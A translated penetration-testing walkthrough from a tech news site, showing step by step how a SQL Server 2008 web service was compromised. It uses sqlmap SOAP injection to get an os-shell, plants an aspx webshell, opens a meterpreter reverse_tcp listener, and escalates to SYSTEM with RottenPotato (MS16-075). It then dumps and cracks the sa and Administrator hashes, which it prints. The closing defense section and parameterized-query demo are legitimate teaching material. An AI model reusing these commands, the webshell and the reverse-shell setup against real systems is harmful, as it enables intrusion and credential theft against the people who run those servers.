2025-04-09 Update From: SLTechnology News&Howtos (shulou), Network Security
Shulou(Shulou.com)05/31 Report--
Many beginners are unclear about how to escalate privileges on a SQL Server 2008 host by combining SOAP injection with msf. The following walkthrough explains it in detail for anyone who needs it.
A successful penetration in practice integrates several techniques and exercises the latest ones. This engagement uses sqlmap to confirm the injection point and obtain a webshell, then uses msf together with MS16-075 to escalate privileges, ending with SYSTEM rights on the target server. It extends the usual exploitation path: when the conventional N-day exploits fail, MS16-075 combined with msf is a classic case of a successful escalation.
1.1.1 scan for soap injection vulnerabilities
1. Run the Web Services Scanner in AWVS. Open AWVS, select Web Services Scanner and, as shown in figure 1, enter the target URL in the WSDL URL field. The URL must end in asmx?wsdl; an application may expose many .asmx files. If you do not know a specific one, you can enter the root directly, for example http://1**.***.***.***:8081/?wsdl.
Figure 1 scanning for soap injection vulnerabilities
2. Handling the SQL blind injection
The AWVS scan confirms a SQL blind injection in the URL (item 26 in the scan results). In AWVS, click "view http headers" on the right, copy the request into a text file, and edit the vulnerable parameter, for example:
The injectable parameter value (shown in red in the original) is replaced with "-1*". The asterisk is sqlmap's custom injection marker; it tells sqlmap exactly where in the SOAP body to inject.
3. The complete request is as follows:
POST /Service1.asmx HTTP/1.1
Content-Type: text/xml
SOAPAction: "http://tempuri.org/ZcpdList"
Content-Length: 716
X-Requested-With: XMLHttpRequest
Referer: http://1**.***.***.***:8081/?wsdl
Host: 1**.***.***.***:8081
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

(SOAP XML body for the ZcpdList operation; its content is not preserved on this page. The injectable parameter value inside it is -1*.)
1.1.2 identify soap injection vulnerabilities
1. Use sqlmap to verify that the SQL injection is real. Save the request above as 1**.***.txt, copy the file into the directory containing sqlmap.py, run sqlmap.py -r 1**.***.txt, and answer the prompts sqlmap shows:
Custom injection marker ('*') found in option '--data'. Do you want to process it? [Y/n/q] y
SOAP/XML data found in POST data. Do you want to process it? [Y/n/q] y
As shown in figure 2, sqlmap confirms the SQL injection in the SOAP parameter: the back-end DBMS is Microsoft SQL Server 2008 running on Windows 2008 R2, and the injection technique is UNION query.
Figure 2 there is a soap injection vulnerability
2. Check whether the database login has DBA privileges. (1) Let sqlmap answer its prompts automatically, as shown in figure 3. Run sqlmap.py -r 1**.***.txt --is-dba --batch; the two prompts that previously needed a y are answered with their default values because of --batch.
Figure 3 automatic submission of parameters for judgment
(2) The login used by the application is a DBA account. As shown in figure 4, sqlmap reports "current user is DBA: True". The application therefore connects with sysadmin (sa-level) rights, which is what makes the --os-shell option usable: on SQL Server, sqlmap's os-shell runs commands through xp_cmdshell, which only a sysadmin can enable and call.
Figure 4 determines whether it is a dba account.
3. Get the sa account password hash
As shown in figure 5, run sqlmap.py -r 1**.***.txt --passwords --batch to dump the password hashes of all logins on the database server (on SQL Server they are read from sys.sql_logins, which again requires sysadmin rights):
Figure 5 get the password of sa account
4. Crack the sa password. sqlmap retrieved the following password hashes:
##MS_PolicyEventProcessingLogin## [1]:
    password hash: 0x01001a7b0c5b5b347506dbc67aa8ffa2ad20f852076d8446a838
##MS_PolicyTsqlExecutionLogin## [1]:
    password hash: 0x01006c6443e1e42ca27773d413042ee8af2eea9026d44c8d4d1c
sa [1]:
    password hash: 0x0100b7b90b706f339288fb0ab4c8a099c4de53045d2de6297e28
Look up the sa value "0x0100b7b90b706f339288fb0ab4c8a099c4de53045d2de6297e28" on www.cmd5.com. As shown in figure 6, the result is "qaz123WSX". The 0x0100 prefix marks the SQL Server 2005+ hash format (a 4-byte salt followed by SHA-1 over the UTF-16LE password and the salt), so the hash can also be cracked offline with hashcat mode 132 instead of being submitted to a third-party site.
Figure 6 decrypting the hash value of sa password
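As an added example that is not from the original article, the following Python verifies a SQL Server 2005+ login hash offline, so the sa hash dumped by sqlmap never has to be sent to a third-party site. It assumes the 0x0100 layout described above; the three hashes are the ones sqlmap returned on this page, and the short wordlist is constructed for the demo.

```python
import hashlib

# SQL Server 2005-2008 R2 store login hashes in sys.sql_logins.password_hash as
#   0x0100 || salt (4 bytes) || SHA1( UTF-16LE(password) || salt )
# (SQL Server 2012+ uses 0x0200 with SHA-512 and a longer salt; not handled here.)
VERSION_2005 = b"\x01\x00"

# Hashes recovered by sqlmap --passwords on this page.
PAGE_HASHES = {
    "##MS_PolicyEventProcessingLogin##": "0x01001a7b0c5b5b347506dbc67aa8ffa2ad20f852076d8446a838",
    "##MS_PolicyTsqlExecutionLogin##": "0x01006c6443e1e42ca27773d413042ee8af2eea9026d44c8d4d1c",
    "sa": "0x0100b7b90b706f339288fb0ab4c8a099c4de53045d2de6297e28",
}


def parse_mssql_hash(h: str):
    """Split a 0x0100 hash into (salt, sha1_digest); reject any other format."""
    raw = bytes.fromhex(h[2:] if h.lower().startswith("0x") else h)
    if len(raw) != 2 + 4 + 20 or raw[:2] != VERSION_2005:
        raise ValueError("not a SQL Server 2005+ (0x0100, salt + SHA-1) hash")
    return raw[2:6], raw[6:]


def mssql_hash(password: str, salt: bytes) -> str:
    """Build a hash the way SQL Server does (used here to create known test cases)."""
    if len(salt) != 4:
        raise ValueError("salt must be 4 bytes")
    digest = hashlib.sha1(password.encode("utf-16-le") + salt).digest()
    return "0x" + (VERSION_2005 + salt + digest).hex()


def check_password(h: str, candidate: str) -> bool:
    """True if candidate is the password behind h (case-sensitive, as in 2005+)."""
    salt, digest = parse_mssql_hash(h)
    return hashlib.sha1(candidate.encode("utf-16-le") + salt).digest() == digest


def crack(h: str, wordlist):
    """Return the first wordlist entry that matches h, or None."""
    for word in wordlist:
        if check_password(h, word):
            return word
    return None


if __name__ == "__main__":
    # Constructed wordlist for the demo; a real run would use a proper dictionary
    # or hashcat -m 132 on the same hash.
    words = ["123456", "Password1", "qaz123WSX", "sa"]
    for login, h in PAGE_HASHES.items():
        print(f"{login}: {crack(h, words) or 'no match in wordlist'}")
```

The result for each hash is printed, not assumed; the page reports that cmd5 returned qaz123WSX for sa. The two ##MS_Policy...## logins are internal, disabled Policy-Based Management accounts and are not worth cracking.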
1.1.3 Get a webshell through --os-shell
1. Start os-shell. Run sqlmap.py -r 1**.***.txt --os-shell and confirm the prompts in the sqlmap window.
Alternatively run sqlmap.py -r 1**.***.txt --os-shell --batch, which needs no manual input.
2. Find the directory of the web application
(1) List files and directories
Run dir c:\ to list the C: drive, then dir c:\inetpub\wwwroot, as shown in figure 7. There is no web application in this folder, so it is ruled out.
Figure 7 View files and directories
(2) Find the real web root by checking drives C, D, E and F in turn. A suspected web application is found on drive E; list it with dir e:\software\AMS_NoFlow, as shown in figure 8.
Figure 8 View the website file
3. Test the real directory of the website
(1) Create a test file, as shown in figure 9. Run echo "thisis test" > e:\software\AMS_NoFlow\t.txt to create t.txt in the web root with the content thisis test.
Figure 9 generate file
(2) website access test
Open http://1**.***.***.***/t.txt in a browser, as shown in figure 10. The expected content is returned, so this directory is the real physical path of the website.
Figure 10 website access test
4. Get the contents of web.config profile
In os-shell run type e:\software\AMS_NoFlow\web.config to read the configuration file. The sqlmap console may not show the full content because of terminal settings, but sqlmap keeps the complete output in its output directory, as shown in figure 11. Opening that log shows the sa password in the connection string, qaz123WSX, which matches the sa hash cracked earlier.
Figure 11 View the contents of the web.config configuration file
5. Get ip address information
As shown in figure 12, running ipconfig in os-shell returns the target's IP configuration. The target has both a separate public IP and an intranet IP; other commands can be run in os-shell the same way.
Figure 12 get the IP address
6. Get a webshell
(1) Write the shell file
Run the following in os-shell:
echo ^<... one-line aspx webshell (the tag contents are not preserved on this page) ...^> > e:\software\AMS_NoFlow\cmd.aspx
Each < and > in the page source must be escaped with ^ so that cmd.exe does not treat it as a redirection operator. As shown in figure 13, the echo returns 1 with no other output, which indicates the file was written.
Figure 13 generate webshell
(2) Connect to the webshell. In the China Chopper (Caidao) backdoor management tool, add a record for http://1**.***.***.***/cmd.aspx with the one-line backdoor password pass. As shown in figure 14, the connection succeeds and the webshell is obtained.
Figure 14 get webshell
1.1.4 Conventional privilege escalation fails
1. Collect system information. Run systeminfo in os-shell and save its output to a text file (SYD1-0081DSB.txt in the next steps).
2. Download Windows-Exploit-Suggester from https://github.com/GDSSecurity/Windows-Exploit-Suggester/
3. Update the vulnerability database with python windows-exploit-suggester.py -u, then compare the system information against it: windows-exploit-suggester.py --audit -l --database 2018-06-04-mssb.xls --systeminfo SYD1-0081DSB.txt > SYD1-0081DSB-day.txt, as shown in figure 15.
Figure 15 for vulnerability comparison
4. Review the results. Open SYD1-0081DSB-day.txt in the C:\Python27 directory. As shown in figure 16, the tool identifies the operating system as Windows 2008 R2 and lists several missing patches; the most recent is MS16-075.
Figure 16 to view vulnerabilities
5. Test the listed vulnerabilities one by one: find and prepare the exploit for each vulnerability number and run it on the target server. Every exploit except the one for MS16-075 fails to escalate privileges.
1.1.5 Escalate privileges with MS16-075 and msf
1. Generate a reverse-connect payload with msf
Run the generation command under msf:
Here windows/meterpreter/reverse_tcp is the reverse payload type, lhost is the IP address of the server that receives the reverse connection, and lport is the listening port; 4433 is also the name of the generated program (4433.exe). Note that lhost must be reachable from the target, i.e. a stand-alone server with a public IP or a public port mapped to the listener; otherwise the reverse connection can never arrive.
2. Start the listener on the listening server
(1) Start msf
msfconsole
(2) Configure the handler
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.33 (in practice the public IP address)
set LPORT 4433
exploit
3. Upload 4433.exe to the target server and run it
Upload 4433.exe through China Chopper or os-shell and execute it.
4. View system information
As shown in figure 17, the target bounces back to the listening server and executes sysinfo to get its system information.
Figure 17 obtaining system information
5. Meterpreter's built-in privilege escalation fails
Running getuid and then getsystem in meterpreter, as shown in figure 18, does not yield SYSTEM.
Figure 18 failed to use the default meterpreter to lift rights
6. Escalate with MS16-075
(1) The MS16-075 exploit (RottenPotato) is available at https://github.com/foxglovesec/RottenPotato. It coerces a SYSTEM-level NTLM authentication and relays it locally so the process can impersonate SYSTEM; it requires the current process to hold SeImpersonatePrivilege, which service accounts such as the SQL Server and IIS application-pool identities normally have.
(2) Upload the potato file
Upload potato.exe through the webshell, or run upload /root/potato.exe in meterpreter.
(3) Obtain a SYSTEM token by running the following commands in turn:
use incognito
list_tokens -u
execute -cH -f ./potato.exe
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"
As shown in figure 19, system permissions were successfully obtained.
Figure 19 obtaining system permissions tokens
(4) Confirm the escalation by running getuid:
As shown in figure 20, the system permissions were successfully obtained.
Figure 20 obtaining system permissions
(5) Dump the password hashes
Run run hashdump in meterpreter, as shown in figure 21. The server's password hash is obtained: Administrator:500:aad3b435b51404eeaad3b435b51404ee:a59a64a645487c1581dea603253c7920::: (the LM half, aad3b435b51404eeaad3b435b51404ee, is the constant empty LM hash, so only the NT hash is usable).
Figure 21 get the password
In this example load mimikatz was also tried to recover the plaintext password, but without a satisfactory result: the commands kerberos, livessp, msv, ssp, tspkg and wdigest all fail to return a plaintext password. You can also run mimikatz_command to enter the mimikatz prompt and work there. Note that the NT hash alone is enough for pass-the-hash (for example psexec with the hash), so cracking it is optional.
(6) Crack the NTLM hash. Copy the NT hash a59a64a645487c1581dea603253c7920 to cmd5.com to crack it (cmd5 charges for this). Other options are http://www.objectif-securite.ch/en/ophcrack.php and https://www.somd5.com/. As shown in figure 22, the password is cracked. The NT hash is an unsalted MD4 of the UTF-16LE password, so hashcat mode 1000 cracks it offline as well.
Figure 22 cracking the ntlm hash
7. Log in to the server. Port-scan the target with nmap -sS -Pn -A 1**.***.***.*** or masscan -p 1-65535 1**.***.***.***; port 3389 is open, so log in with mstsc. As shown in figure 23, the login succeeds.
Figure 23 successful login to the server
1.1.6 Summary and Defense
1. Summary of the main commands used in this penetration
(1) sqlmap commands
sqlmap.py -r 1**.***.txt
sqlmap.py -r 1**.***.txt --is-dba --batch
sqlmap.py -r 1**.***.txt --passwords --batch
sqlmap.py -r 1**.***.txt --os-shell --batch
(2) Commands run in os-shell
ipconfig
dir c:\
echo "thisis test" > e:\software\AMS_NoFlow\t.txt
echo ^<...^> > e:\software\AMS_NoFlow\cmd.aspx
type e:\software\AMS_NoFlow\web.config
(3) msf command to generate the reverse-connect payload:
(4) msf listener
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.33 (in practice the public IP address)
set LPORT 4433
exploit
(5) MS16-075 privilege escalation commands
use incognito
list_tokens -u
execute -cH -f ./potato.exe
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"
getuid
(6) Dump hashes: run hashdump
(7) Get passwords with mimikatz
load mimikatz
kerberos, livessp, msv, ssp, tspkg, wdigest (test command by command; some may show a plaintext password)
mimikatz_command: opens the mimikatz command prompt
(8) Get passwords from the mimikatz command line (untested)
2. Penetration summary
In this penetration, sqlmap tested the SOAP injection, confirmed that the injection point was usable, and obtained a webshell through os-shell. After obtaining the webshell, the conventional N-day privilege escalations failed, and MS16-075 combined with msf succeeded. Windows-Exploit-Suggester identifies candidate local vulnerabilities; escalating with the newest vulnerability from its audit gives, in the author's experience, a hit rate of about 99%.
3. Security defense
After the server was compromised, no security software was found on it. Based on this experience, the author recommends the following defenses:
(1) Validate and filter the SOAP parameters to remove dangerous input that leads to SQL injection. Filtering alone is fragile; the reliable fix is to pass every parameter to SQL Server through parameterized queries or stored procedures rather than string concatenation.
(2) Connect the application to MSSQL with a low-privilege login instead of sa. Without sysadmin rights, sqlmap can neither read the login hashes nor reach xp_cmdshell, so an injection no longer turns into a shell; xp_cmdshell should also remain disabled.
(3) Update and upgrade the server regularly. MS16-075 was patched in June 2016, and the missing patch is exactly what made this escalation possible.
(4) Install antivirus software, a WAF and a hardware firewall to raise the attacker's cost and difficulty.
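As an added example that is not part of the original article, the following Python shows defense (1) in working code: the ZcpdList lookup written with string concatenation, which the UNION injection reported by sqlmap turns into a dump of the login hashes, beside the parameterized version that rejects the same input. SQLite stands in for SQL Server so the example runs offline; the table names, the integer id parameter and the sample rows are assumptions, and the sa hash is the one from this page.

```python
import sqlite3

SA_HASH = "0x0100b7b90b706f339288fb0ab4c8a099c4de53045d2de6297e28"  # from the page

# UNION-query payload of the kind sqlmap reported (constructed here).
PAYLOAD = "-1 UNION SELECT name, password_hash FROM sql_logins"


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for the application database and sys.sql_logins."""
    con = sqlite3.connect(":memory:")
    con.executescript(f"""
        CREATE TABLE zcpd(id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO zcpd VALUES (1, 'record-one'), (2, 'record-two');
        CREATE TABLE sql_logins(name TEXT, password_hash TEXT);
        INSERT INTO sql_logins VALUES ('sa', '{SA_HASH}');
    """)
    return con


def zcpd_list_vulnerable(con, list_id: str):
    # The SOAP parameter is pasted into the SQL text, so the client controls the
    # query; this is the pattern sqlmap's -1* marker exploited.
    sql = "SELECT id, name FROM zcpd WHERE id = " + list_id
    return con.execute(sql).fetchall()


def zcpd_list_safe(con, list_id: str):
    # Check the type first, then bind the value as a parameter: the database
    # receives it as data and never parses it as SQL.
    try:
        value = int(list_id)
    except ValueError:
        raise ValueError("ZcpdList id must be an integer")
    return con.execute("SELECT id, name FROM zcpd WHERE id = ?", (value,)).fetchall()


if __name__ == "__main__":
    con = build_db()
    print("vulnerable:", zcpd_list_vulnerable(con, PAYLOAD))  # leaks the sa hash
    print("safe, normal id:", zcpd_list_safe(con, "2"))
    try:
        zcpd_list_safe(con, PAYLOAD)
    except ValueError as err:
        print("safe, payload rejected:", err)
```

The parameter binding is what removes the injection; the int() check is defense in depth that also gives the client a clean error instead of a database error. In the real ASMX service the same split is SqlCommand.Parameters versus string concatenation. Defense (2) is what limits the damage if a query is still missed: a login that is not sysadmin cannot SELECT password_hash from sys.sql_logins and cannot enable xp_cmdshell, so even a working UNION query stops at the application's own tables.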